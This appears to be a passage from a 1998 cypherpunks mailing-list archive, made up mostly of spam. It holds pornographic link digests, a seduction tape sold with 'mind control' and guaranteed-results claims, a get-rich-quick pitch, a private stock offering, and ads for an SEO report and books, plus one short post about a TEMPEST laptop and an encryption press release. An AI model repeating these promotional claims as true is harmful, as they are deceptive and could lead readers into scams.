reject sites. In short, we can *tell* you 




----------------

SOLUTION: THE "SECRETS TO GETTING A TOP YAHOO! LISTING" REPORT

We offer an information-packed "Secrets to getting a top 
Yahoo! listing" report that will tell you exactly what 
Yahoo! editors will be looking for when they evaluate your 
site. 

You can learn from hundreds of other people's mistakes so 
that you won't make them when submitting--or resubmitting--
your site.


Here's what's covered in the report:

<> A general overview of Yahoo! and how it works

<> The technical details of what they look for 

<> What *specific* types of content you *must* have

<> What *never* to do before submitting to Yahoo!

<> Why looking at your competitors is so important before
     submitting

<> The specifics of how to submit properly to skyrocket
     your chances

<> The best-kept secret on the net: this single submission 
     technique alone has achieved top rankings for many of
     our clients!
   

----------------

FOR THE SERIOUS SITE OWNER--THE CUSTOMIZED YAHOO! EVALUATION


We also offer a "Customized Evaluation" service where we'll 
examine your site like a Yahoo! editor will--and tell you, 
step-by-step, each of the changes you'll need to make before 
submitting to Yahoo!.


The "Customized Evaluation" includes all of the information 
from the "Secrets to getting a top Yahoo! listing" report *plus*:

<> A customized evaluation of your competitors' sites and why 
      they are so important to consider before submitting

<> An evaluation of your site's technical specs. and 
      recommendations for improving them

<> An evaluation of your site's content and recommendations 
      for improving it





----------------

SUMMARY: WHY YOU NEED A GOOD LISTING ON YAHOO!

(1) If you're thinking of submitting your site to Yahoo!
--or have already tried and failed--put our research and 
the failure of others on your side.

(2) Let us help you dramatically improve the effectiveness 
of your on-line marketing efforts. Preparing your site for
Yahoo! is worth the extra effort.

(3) Remember: Yahoo! is the only *free* Internet marketing
resource that can help you to increase your long-term goals 
of widespread exposure and profitability.

(4) Best of all, once your listed in Yahoo, you're there 
forever. This one-time effort will be rewarded with years of
residual benefits.
benefits



----------------

PRICING

"Secrets to getting listed on Yahoo!" report -- $99

Customized Web site evaluation (incl. report) -- $249




----------------

CONTACT US:    Call us at:  (314) 994-1286

<> Learn more about the Yahoo! project and us.  We'll explain
exactly how we can maximize your particular site's chances
of a top Yahoo! listing

<> We'd love to answer any questions you might have! 

<> It could be the single most important phone call you'll ever
make when it comes to the on-line success of your website!

                            (314) 994-1286


 




----------------
If you've received this E-mail in error, or do not desire to receive 
any further mailings from the Yahoo! Project Team, please REPLY to
this E-mail with the word "REMOVE" in the E-mail's subject line.

Thank you.















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON NOV 9 <stuffed@stuffed.net>
Date: Mon, 9 Nov 1998 01:21:14 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981109081000.20348.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ LESBIAN FRIENDS
+ TECHNOPORN
+ SOUTHERN BELLE BLOWJOBS
+ HOT PICS II
+ NAKED 4 U
+ ORGASM 4 ALL
+ JACK IN THE BOX PORNO
+ SAVING RYAN'S PRIVATES
+ STIFF ONE EYE
+ CHAPO'S SEX PAGES
+ BONUS PIC 1 -> http://www.stuffed.net/home/20001.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/3051.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/15393.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/16985.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/24093.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 9 Nov 1998 05:09:00 -0800 (PST)
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: TEMPEST Laptop from Wang
Message-ID: <19981109082107.A13046@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to not post the article, but Wang just announced a TEMPEST
compliant portable computer.

http://www.news.com/News/Item/0,4,28483,00.html?st.ne.fd.mdh



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: swedegirl@tracor-es.com
Date: Mon, 9 Nov 1998 15:21:02 -0800 (PST)
To: fireball@3253137429.tracor-es.com
Subject: Attract men and/or women
Message-ID: <199811092252.RAA16047@host13.tracor-es.com>
MIME-Version: 1.0
Content-Type: text/plain


Ecstasy - The Seduction Audio Cassette Tape! 

Can Modern Technology be used to put women into a more "receptive mood?" 
Can Modern Technology be used to make women "more attractive" to men? 
Can Modern Technology make you a better lover, a more satisfied lover, a more confident lover? 


         YES IT CAN! 

Read what just two customers said: 

"I never met so many women so happy to sleep with me!" 
          JK, Des Moines IA 
  
"WOW. Thanks for a sexual experience I did not dream possible without drugs." 
          HP Manhattan, NY 
  
According to Dr. Martin Feinberg: 
       "This is an amazing and unique tape. The sounds were designed to stimultate brain centers. To enhance pleasure. Reach new levels of sexual experiences without any chemicals or drugs but rather by allowing you mind to be stimulated by audio signals. The velvet voice provides a hypnotic-like state that produces a flow of intense pleasure and satisfaction. All that you need to do is listen." 

Hundreds of Tapes have been sold -- and rarely has one been returned. It is fully guaranteed to work as advertised or your money is refunded. You have NOTHING to lose. 

The Ecstasy tape was designed by a licensed Mental Health Counsellor specifically for her clients who had problems meeting the opposite sex, attracting the opposite sex, and having great sex with the opposite sex. Clinically tested, and set to digital music specifically designed to enhance the effects of the tape, you may never find another 
tape like it. Not yet sold in stores, it is only available on the Internet. 

    Listen to the Ecstasy Tape alone or with a lover or friend. 
    Listen to the Ecstasy Tape and change the way you meet women/men. 
    Listen to the Ecstasy Tape and change the way women and men feel     about you. 
    Listen to The Ecstasy Tape and change the way you experience sex forever. 

100% Legal. 

Is it mind control? 
       You'll have to listen and decide for yourself. 

GUARANTEED* TO: 

       Have potential lovers be attracted to you. 
       Be a Great Lover. 
       Maximize Your Sexual Pleasure. 
       Satisfy any lover. 
   *GUARANTEED or your money refunded! 

As you listen to the tape your body will feel what it never felt before. 
       Listen alone. 
       Or with a lover. 
       It is a most unbelievable, indescribable experience. 

       100% Legal. 
       Not a drug. But as powerful as drugs. 
       Not an aphrodisiac. But as powerful as one. 
       Not subliminal but more powerful. 

This tape, this experience is 100% legal, however, you must be over 18 to purchase it. 
No exceptions. 

Absolute satisfaction or purchase price refunded. 

Listen to the Ecstasy Tape. Experience True Sexual Ecstasy. For 6 months. 

If you can bear to return the tape after trying for up to 6 months, we will refund your payment. 

This may be your first and last opportunity to experience Ecstasy possibly the only seduction tape you'll ever find that really works. 

The digitally prepared Audio Cassette is $19.47 shipped to you. ($17.12 plus $2.45 shipping/handling). Florida residents add sales tax. 

It is easy to order. You must be over 18.  No exceptions. 

The digitally prepared Audio Cassette is $19.47  shipped to you. ($17.12 plus $2.45 
shipping/handling).  Florida residents add sales tax. 

To order with your MasterCard, Visa, Discover or American Express card. 

Call our operators (24 hours) at (520) 453-0303 Extension - 222 
        And say "I'd like to order the Ecstasy Tape." 

OR 
        mail a check or money order for $19.47 to: 
               Euphoria Products 
               1859 No Pine Island Rd. 
               Suite #133 Dept.222 
               Plantation, FL 33322 

        Include your name and street address and write "I would like __ copies of the Ecstasy Tape # 222."  

Get extra tapes as gifts: add $9.50 for each additional tape. No additional shipping. 
























The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please goto:

http//3625362989/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE NOV 10 <stuffed@stuffed.net>
Date: Tue, 10 Nov 1998 02:36:53 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981110081000.6668.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ FAST LOADING XXX HARDCORE
+ WHITE CHOCOLATE
+ BLOW BABY BLOW
+ NYMPHO9
+ ASIAN SLUTS
+ SAVING RYAN'S PRIVATES
+ PLAYSX
+ BLONDES WITH BIG TITS
+ BITCHES IN HEAT
+ MIDNIGHT PASSION
+ BONUS PIC 1 -> http://www.stuffed.net/home/13204.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/18769.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/10668.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/19144.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/24117.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: private@soon.com
Date: Tue, 10 Nov 1998 12:13:02 -0800 (PST)
Subject: securities - PRIVATE PLACEMENT WSG TECH, INC.
Message-ID: <199811101951.NAA17490@dns.rodpas.com.mx>
MIME-Version: 1.0
Content-Type: text/plain


Opportunities in manufacturing and marketing patented products. This
announcement is neither an offer to sell nor a solicitation of an offer to
buy these securities.  Sales will be made only by a final Offering
Memorandum and only in states where these securities may be offered in
compliance with the securities laws of such states.  The final
Offering Memorandum will NOT be available to residents of the states of
Hawaii, Washington, or Wisconsin.  PRIVATE PLACEMENT MEMORANDUM REGULATION
- RULE 504 UNDER THE SECURITIES ACT OF 1933.  500,000 Shares of
Common class non-voting stock.  (Par Value $.001 Per Share) $2.00 Per
Share with a 5,000 Share Minimum of WSG Tech, Inc.  WSG Tech, Inc.
(Company), a Nevada corporation was incorporated in Nevada in August
1998.  The Company owns the manufacturing and distribution rights, or
has the Options to the rights of several commercially viable patented
products, and is negotiating for others.  The firm also owns the option to
purchase an established manufacturing firm with over twenty (20) years of
continuous profitable performance.  The completion of this purchase
will give WSG Tech, Inc. complete control over the manufacturing, sales,
distribution and fulfillment of its own products.  It will also give
the Company a core business of manufacturing for other clients as well as
an experienced production and sales staff.  The Company has recently
concluded an Agreement with an International marketing firm, and is
negotiating an agreement for the manufacture and distribution of its
products in Europe and South America.  The Company's corporate mailing
address is P.O. Box 541732 Lake Worth, Florida 33454 USA  The company is
offering to the public an invitation to participate in the funding of the
company.  For a copy of the Offering Memorandum, you may contact the
Company's investment consultant, e-mail us at privateplacement@bigfoot.com
Be sure to put "Send Me A Copy" in the Subject Line and include your name
and address.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inform@what2read.com (Information What2Read)
Date: Mon, 16 Nov 1998 21:20:55 -0800 (PST)
To: what2read-l@what2read.com
Subject: Black Book Source
Message-ID: <36492CF3.8F99F883@what2read.com>
MIME-Version: 1.0
Content-Type: text/plain



www.WHAT2READ.COM

Your on-line source for books by African Americans and other prominent
blacks.
 
Find books to help you with your holiday cooking and entertaining;
 
Beautiful gift books, books for children and books for sheer reading
enjoyment.
 
We also have book reviews and books listed by category including
bestsellers
biographies
fiction--popular and literary
inspirational
 
Over 400,000 titles available and all at DISCOUNT prices.

COME VISIT US!

www.what2read.com
 

LIST UNSUBSCRIBE
*****************************************
You can unsubscribe from this list at:

http://www.bidwhist.com:81/guest/RemoteListSummary/What2ReadGeneral

What2Read, Inc.
5310 S. Cornell Ave.
Suite 3
Chicago, IL 60615
 
 
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <Announcements_reply@rpkusa.com>
Date: Tue, 10 Nov 1998 16:27:46 -0800 (PST)
To: Announcements@rpk.com
Subject: ANNOUNCEMENT: RPK SECURITY ADDS C SOURCE LIBRARY AND SOLARIS PORT TO ENCRYPTONITE POWERFUL PUBLIC KEY ENCRYPTION TOOLKIT
Message-ID: <199811110023.QAA16095@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------

CONTACT:
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security, Inc.
(831) 439-5570 x277						(212) 488-9891	
paulam@nadelphelan.com					lynoswald@rpkusa.com
			

RPK SECURITY ADDS C SOURCE LIBRARY AND SOLARIS PORT TO ENCRYPTONITE POWERFUL PUBLIC KEY ENCRYPTION TOOLKIT 

SAN FRANCISCO, CA. November 3, 1998 - RPK Security, Inc. (www.rpkusa.com), a technology leader in fast public key encryption, announced today the addition of a Solaris port and C source library to its RPK Encryptonite Software Toolkit version 3.0. The RPK Toolkit enables integrators, developers and engineers to quickly and easily incorporate fast public key encryption and strong security into applications, without knowledge of cryptography.

The RPK Toolkit, a software implementation of the RPK Encryptonite Engine, allows developers to build custom applications with strong encryption for information sensitive applications and industries such as Internet, communications, legal, health care and financial services. The Toolkit provides 40 percent improvement in engine initialization (compared with V2.1), resulting in remarkably better application response times.  With a new "packet encryption" technique, the RPK Toolkit is well suited for broadcast and multi-cast applications, especially on the Internet. 

"Because the RPK Toolkit is developed outside of the U.S., it is not subject to U.S. export laws which gives a tremendous advantage to international customers, allowing them to produce secure, fast and flexible systems with strong encryption," said Jack Oswald, president and CEO of RPK Security.

The RPK Encryptonite Engine uniquely combines all the benefits of other public key systems (authentication, digital signatures and digital certificates) with the speed of a secret key system into one algorithm. With the Encryptonite Engine's superior performance, applications requiring streaming data, sound, video or numerous transactions, such as credit card payments, receive instantaneous responses and secure communication links. The RPK Toolkit includes: ANSI standard C/C++ libraries for Win95/98/NT, HP/UX, Sun Solaris (C only) and Linux, Delphi 3.0/4.0 VCL component for Win95/NT, DLL and ActiveX.  It also has been compiled and tested with Visual C++, Borland C++ Builder and gnu/g++.

Pricing and Availability:
The RPK Encryptonite Software Toolkit is available for licensing worldwide. Pricing starts at $695 per developer (development only). Deployment license fees are based upon custom configurations. For sales information, call (415) 563-1800 or e-mail sales@rpkusa.com

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key encryption. RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing in San Francisco, CA.  Contact RPK at www.rpkusa.com or (212) 488-9891 or www.rpkusa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Exodus.Books" <Exodus_Books@bellsouth.com>
Date: Tue, 10 Nov 1998 22:18:59 -0800 (PST)
To: <cynthia@elle.com>
Subject: "Pulpit Confessions: Exposing The Black Church"
Message-ID: <199811110547.AAA02632@websmtp1.bellsouth.bigfoot.com>
MIME-Version: 1.0
Content-Type: text/plain


CALL TODAY TO ORDER THIS BOOK - (800) 830-2047

"What nobody had the nerve to tell you until now."
"Real evidence of what you only suspected."
"The Black Church as you've never known it before."


Pulpit Confessions:
Exposing The Black Church

by
N. Moore

$16.00
ISBN: 0-9658299-2-8
_____________________________
Pulpit Confessions: Exposing The Black Church is an honest,
behind the scenes look at the African-American church. The
author spent a decade as a preacher and pastor in the black
church and is actually betraying an unofficial code of
silence by writing this book.

The author began ministry in his teens and was pastoring
by his early twenties. He speaks frankly about his and other
ministers' odysseys from sincere, well intentioned prodigies
to cynical, sinful, showman.

He soon discovered that things in the church were not as they
seemed. In this ground-breaking book, he describes a secular
and often profane ministerial community that is often shrouded
in pseudo holiness.

He exposes the thoughts and motivations of both ministers and
congregations and their degenerate power struggles which
often turn violent.

He pulls no punches when he untangles the myths, unravels the
mystique and reveals the secrets of the Black Church.

_____________________________
Chapter Titles
"The Call"
"The Process"
"Mentors"
"Let's Talk About Preaching"
"Landing A Church"
"Show Me The Money"
"Learning To Play Hard Ball"
"Dr. Jekyll and Rev. Hyde"
"Where Do We Go From Here?"
_____________________________

ORDERING INFORMATION

Pulpit Confessions:
Exposing The Black Church
by
N. Moore
$16.00
ISBN: 0-9658299-2-8
$3.00 Shipping and Handling
_____________________________
Order By Phone
800-830-2047
---------------------------
Exodus Books
5411 E. State Street #348 
Rockford, IL 61108





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED NOV 11 <stuffed@stuffed.net>
Date: Wed, 11 Nov 1998 01:23:38 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981111081000.11842.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ HOT PICS II
+ COLLEGE GIRLS IN HEAT
+ HENTAI ANIME
+ SKIN CENTRAL
+ 2 PERVERSE 4 U
+ PLAY SLUTS
+ HOT BABES
+ HOT HUNNYS HARDCORE
+ ORGY SEX
+ THE PORN PALACE
+ BONUS PIC 1 -> http://www.stuffed.net/home/9229.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/25519.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/10897.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/13263.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/16616.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: magic3@n2mail.com
Date: Wed, 11 Nov 1998 10:56:58 -0800 (PST)
To: Friend@public.com
Subject: If you need a change of lifestyle, read on......
Message-ID: <199811111848.TAA24924@ns.iqnet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Discover for yourself a business that provides a 5 Figure Income within the
1st month and Fantastic Income within the 1st week! 

I Actually Net $1,000 My First Week
& $12,000 My First Month In This Business!

Call the toll free number, 1-800-811-2141, ID #58420
This Isn't MLM.
There Is Absolutely NO Selling (You Will Never Touch The Telephone)
There Is No Large Investment.  Just A Consistent Weekly Pay Check.
Anyone Can Do This Business and I Mean Anyone!
But, Don't Take My Word For It!

Call The Toll Free Number!  1-800-811-2141, ID #58420
You will need ID #58420 (Live Operators Are Waiting To Take Your Call Monday - Saturday 8AM-
10PM CST)
Want paperwork in your hands FOD: 415-273-6020 (7 pg.)
For international callers, go to http://www.net2phone.com  to be able to call this number.
LISTEN TO OUR TOLL FREE RECORDED CALL 1-888-446-6949 or 1-888-703-5389

Work smarter, not harder.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU NOV 12 <stuffed@stuffed.net>
Date: Thu, 12 Nov 1998 01:14:37 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981112081000.9136.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ NAUGHTY LADY
+ PORN MIX
+ SEXY BLACK BABES
+ VERTICAL SMILES
+ WILD WORLD OF SEX
+ 4 PUSSY
+ ADULT WEB CIRCUShttp://www.znd2.net/karpo/AAA/
+ SEX HAPPY
+ HORNY HEATHER'S CUM SHOTS
+ JACK'S HOUSE OF SLUTS
+ BONUS PIC 1 -> http://www.stuffed.net/home/3843.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/3985.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/25033.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/27786.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/12878.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "5se Investment Research" <webmaster@5se.com>
Date: Thu, 12 Nov 1998 22:25:30 -0800 (PST)
To: unlisted-recipients:; (no To-header on input)
Subject: Long Term Returns: Value vs. Growth
Message-ID: <003701be0ecd$dea21000$0c1c9ad1@default>
MIME-Version: 1.0
Content-Type: text/plain


Dear Fellow Investor,

Recently two professors from the University of Chicago, Eugene Fama and Ken
French, published a study demonstrating the difference in long term returns
of value and
growth stocks. The study encompassed almost all stocks on every major US
exchange.

This celebrated study presented overwhelming evidence that market forces
tend to overreact to past events, pricing growth stocks too high, and value
stocks too low. Because of these reactions, as a group, growth stocks
produce below average returns for investors who purchase them at high
prices, and value stocks produce above average returns for investors who
purchase them at depressed prices.

The professors used book to market value to correlate the long term returns.
Value stocks having high book to market value and Growth stocks identified
by a low book to market value.

On average the stocks fitting the value criteria had average annual returns
of 21.4% while growth stocks had only 8% average annual returns. Factoring
in inflation, the real long term rate of return for value stocks is a bit
over 15% but only 2.5% for the growth group.

Essentially the study is a good reminder that, when it comes to investing,
what goes around comes around. Good companies can experience bad times and
be unfairly priced. Apple, IBM, Coke, American Express, and many other
excellent companies have experienced the wrath of an unforgiving market, and
yet, they are companies with a proven ability to persist in the face of
large challenges.

Identifying value is simple. All you have to do is look for Good companies
experiencing temporary difficulties. This simple strategy will, if you are
willing to wait out the storm, reward you with hefty long term returns and
lower risk (as the F&F study also showed).

Stocks that meet the F&F criteria for value and have solid management in
todays market include:

Callaway Golf
Ensco Corp
Reebok
Advanta Corp

To learn more about the F&F study read Robert Haugen's book "The New
Finance" available at

http://www.5se.com/5se1.htm


Regards,

Jeffrey Minich
5se Investment Research

New at the 5se site
**********************
PortfolioPower! Portfolio Management Model versions for both Excel 95 & 97.
Special Upgrade price, only $19.95, for PortfolioPower! Trial Users.
Includes a special single-issue online preview of the latest 5se Wealth
Building Report.

Instant online credit card payment processing and PortfolioPower! order
fulfillment with your American Express, Visa, Mastercard, Diners Club, or
Discover card.

http://www.5se.com/secretproduct.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI NOV 13 <stuffed@stuffed.net>
Date: Fri, 13 Nov 1998 01:55:23 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981113081000.1148.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ISLAND EROTICA
+ BIGGINS
+ WET WET WEB
+ INDIAN PORN
+ PURE PIX
+ WHITE CHOCOLATE
+ XXX FEMALES
+ HARDCORE SEX WITH ZOOM
+ CUMSHOT QUEENS
+ XXX 4 FREE
+ BONUS PIC 1 -> http://www.stuffed.net/home/31225.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/15219.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/6401.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/9541.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/9140.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walt86@hotmail.com
Date: Fri, 13 Nov 1998 09:18:14 -0800 (PST)
To: walt86@hotmail.com
Subject: ''FOR YOUR EYE'S ONLY"
Message-ID: <9811131313.AA01924@vibora.ica.luz.ve>
MIME-Version: 1.0
Content-Type: text/plain



     
    
    Do you know who you're sleeping with? 
    
    
    Do you know what your background report says? 
   
    
    Who's Caring For Your Children? 

                             
    
           http://www.nation-search.com



    
    To unsubsribe from this list, both remove and             undelverable. 
    
    walt@nation-search.com
    
    
    
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 01143572@amdiscount.net
Date: Sat, 14 Nov 1998 14:53:29 -0800 (PST)
To: Friend@public.com
Subject: Confidential Scanner Service
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


CONFIDENTIAL SCANNING SERVICE

First item scanned $5.00. Second item scanned $4.00.  Each additional item scanned $3.00

We will scan and send file to your e-mail address within 24 hours after receipt.
If you would like your photo returned you must enclose a self addressed and stamped envelope

Files should be checked as soon as possible for your satisfaction. All photos received without directions for return will be destroyed after 10 days
We accept Master Card ,Visa, Cash or Money Order  (no checks) 
Required Information

E-mail address_____________________

Save as _________________File (Gif or JPEG) for the web or (TIF) for artwork.

Required information for mature or adult photos

I AM 18 YEARS OF AGE OR OVER AND THERE ARE NO PERSONS IN THESE PHOTOS UNDER 18 YEARS OF AGE.

Signed by:____________________________________________

Required information for credit card

MC_____ Visa_____  Card #________________________Expiration_____________

Name of cardholder____________________________________________________

Address _____________________________________________________________

City_______________________________ST_________ZIP________________

Mail form and payment or payment information to:
American Discount Services
8515 Douglas Suite 32
Des Moines, IA  50322

For additonal information call 515-270-9651





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT NOV 14 <stuffed@stuffed.net>
Date: Sat, 14 Nov 1998 02:24:50 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981114081000.12518.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ZEE ASS
+ CYBER SEX
+ FACIAL GLORY
+ SLUTS 4 ALL
+ LIBRARY OF EROTICA
+ ADULT PORN PICS
+ GIRLS OF WWWONDERFUL
+ FACIAL BABES
+ WHITE CHOCOLATE
+ FREE HARDCORE PORN
+ BONUS PIC 1 -> http://www.stuffed.net/home/25839.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/26453.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/20538.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/24064.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/5402.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN NOV 15 <stuffed@stuffed.net>
Date: Sun, 15 Nov 1998 01:13:57 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981115081000.10264.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ HARDCORE SEX WITH ZOOM
+ MY BUTT COLLECTION
+ ABSOLUTE XXX
+ CATIJANA'S PUSSY PICS
+ EXCESSIVE
+ SEX CARNIVAL
+ WAANAADOOUS
+ DILDO MANIA
+ A1 HARDCORE
+ TITS 4 FREE
+ BONUS PIC 1 -> http://www.stuffed.net/home/20453.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/4919.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/1906.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/5819.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/1663.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluefish@swipnet.se
Date: Sun, 15 Nov 1998 16:22:33 -0800 (PST)
Subject: Put America's Best Chili Recipes on Your Christmas List
Message-ID: <199811160022.QAA25244@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


AMERICA's BEST CHILI RECIPES ARE NOW HERE!!!

Check out our special 2 for 1 offer

All orders received December 15, 1998 are guaranteed to be 
delivered by Christmas.


Nothing is more American than a hot bowl of Chili, but if you ask 
a hundred people about how to make the best bowl of chili you'll 
probably get a hundred different answers.

America's Best Chili Recipes hopes to help answer this question 
by offering fifty of the most diverse Chili recipes that you will 
find anywhere. Plus, these recipes don't come from any sterile 
kitchen test labs, but from the family picnics,backyard 
barbecues, and tailgate parties of Chili lovers from across 
America. 

Our book is divided into four separate chapters:

Chapter I	Traditional Chili 
Chapter II	Chili with Beans
Chapter III	Low Fat/Vegetarian Chili
Chapter IV	Prize Winners			


Among the recipes you'll enjoy are:

***Barbecue Chile from New Jersey
***Lobster Chili from Maine
***Seven Pepper Chili from San Antonio
***Kosher Chili from New York 
***Nuclear Chili from San Francisco

In addition, with each recipe you'll get the story behind the 
recipe. Each contribution contains an entertaining story or 
anecdote from the person who sent the recipe. 

Read about:

*** The Ghost in the Chili Pot
*** The Secret behind Comet Chili
*** Chili passed down through three generations of LA Firemen

Buy the book for the recipes, or buy it for the stories. You'll 
find that there is a chili recipe for every finicky eater.





SPECIAL OFFER!!!

Our book normally sells for $12.95 +$2.00 shipping/handling.  
However, this Holiday Season you can get Ameica's Best Chili 
Recipes for only $9.95, and we'll pay for shipping and handling 
-- a savings of $5.00.

GET TWO COPIES AND SAVE EVEN MORE!!!

Give a copy this Christmas to a friend or relative. If you buy a 
